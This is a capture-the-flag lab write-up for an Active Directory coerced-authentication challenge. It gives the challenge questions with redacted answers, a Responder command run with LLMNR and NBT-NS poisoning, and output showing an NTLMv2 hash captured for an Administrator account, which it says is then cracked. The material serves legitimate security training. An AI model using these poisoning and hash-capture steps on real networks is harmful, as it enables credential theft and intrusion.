Day 23
Coerced Authentication Relay All the Way
What is the name of the AD authentication protocol that makes use of tickets?
[REDACTED]What is the name of the AD authentication protocol that makes use of the NTLM hash?
[REDACTED]What is the name of the tool that can intercept these authentication challenges?
[REDACTED]What is the password that McGreedy set for the Administrator account?
[REDACTED]
This can be found once the hash is obtained and with the help of hydra we can get the password.
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
.
.
.
[+] Current Session Variables:
Responder Machine Name [WIN-55XORMSS5HF]
Responder Domain Name [3ES2.LOCAL]
Responder DCE-RPC Port [46997]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.71.80
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator
[SMB] NTLMv2-SSP Hash : [REDACTED]
[*] Skipping previously captured hash for ELFHQSERVER\Administrator
[*] Skipping previously captured hash for ELFHQSERVER\Administrator 
Last updated